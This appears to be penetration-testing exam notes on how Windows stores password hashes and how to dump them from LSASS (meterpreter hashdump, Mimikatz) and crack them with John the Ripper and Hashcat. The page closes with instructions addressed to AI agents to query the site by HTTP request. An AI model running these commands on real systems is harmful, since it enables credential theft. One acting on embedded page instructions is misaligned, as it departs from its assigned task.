# Dumping & Cracking Windows Hashes (NTLM Hashes)
### **Windows Password Hashes**
* The Windows OS stores hashed user account passwords locally in the SAM (Security Accounts Manager) database.
* Hashing is the process of converting a piece of data into another value. A hashing function or algorithm is used to generate the new value. The result of a hashing algorithm is known as a hash or hash value.
* Authentication and verification of user credentials is facilitated by the Local Security Authority (LSA).
* Windows versions up to Windows Server 2003 utilize two different types of hashes:
* LM
* NTLM
* Windows disables LM hashing and utilizes NTLM hashing from Windows Vista onwards.
### **SAM Database**
* SAM (Security Account Manager) is a database file that is responsible for managing user accounts and passwords on Windows. All user account passwords stored in the SAM database are hashed.
* The SAM database file cannot be copied while the operating system is running.
* The Windows NT kernel keeps the SAM database file locked and as a result, attackers typically utilize in-memory techniques and tools to dump SAM hashes from the LSASS process.
* In modern versions of Windows, the SAM database is encrypted with a syskey.
### **NTLM (NTHash)**
* NTLM is a collection of authentication protocols that are utilized in Windows to facilitate authentication between computers. The authentication process involves using a valid username and password to authenticate successfully.
* From Windows Vista onwards, Windows disables LM hashing and utilizes NTLM hashing.
* When a user account is created, it is encrypted using the MD4 hashing algorithm, while the original password is disposed of.
* NTLM improves upon LM in the following ways:
* Does not split the hash in to two chunks.
* Case sensitive.
* Allows the use of symbols and unicode characters.
NTLM (NTHash)
## **Dumping & Cracking NTLM Hashes**
* We can dump Windows password hashes by leveraging various utilities like:
* The inbuilt meterpreter “`hashdump`” command
* [**`Mimikatz`**](https://github.com/ParrotSec/mimikatz)
* After we have dumped the hashes, we can crack them through the use of the following utilities:
* [**`John The Ripper`**](https://www.openwall.com/john/)
* [**`Hashcat`**](https://hashcat.net/hashcat/)
### **Meterpreter Commands:**
* **`pgrep lsass`** – Find the process ID (PID) of the "lsass" process.
* **`migrate 708`** – Migrate to another process with the PID 708.
* **`hashdump`** – Dump password hashes from memory.
### **Cracking Password Hashes with John the Ripper:**
To crack password hashes using John the Ripper, you can use the following command:
```bash
john --format=NT hashes.txt
```
This command attempts to crack password hashes stored in the "hashes.txt" file using John the Ripper, with the specified hash format.
### **Cracking Password Hashes with Hashcat:**
To crack password hashes using Hashcat, you can use the following command:
```bash
hashcat -a3 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
```
This command uses Hashcat with attack mode 3 and hash mode 1000 to attempt to crack password hashes stored in the "hashes.txt" file using the "rockyou.txt" wordlist.
***
***
***
**`Hacker's Mantra:`**`Hackers: the rebels of the tech world.`
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/post-exploitation/dumping-and-cracking-windows-hashes-ntlm-hashes.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.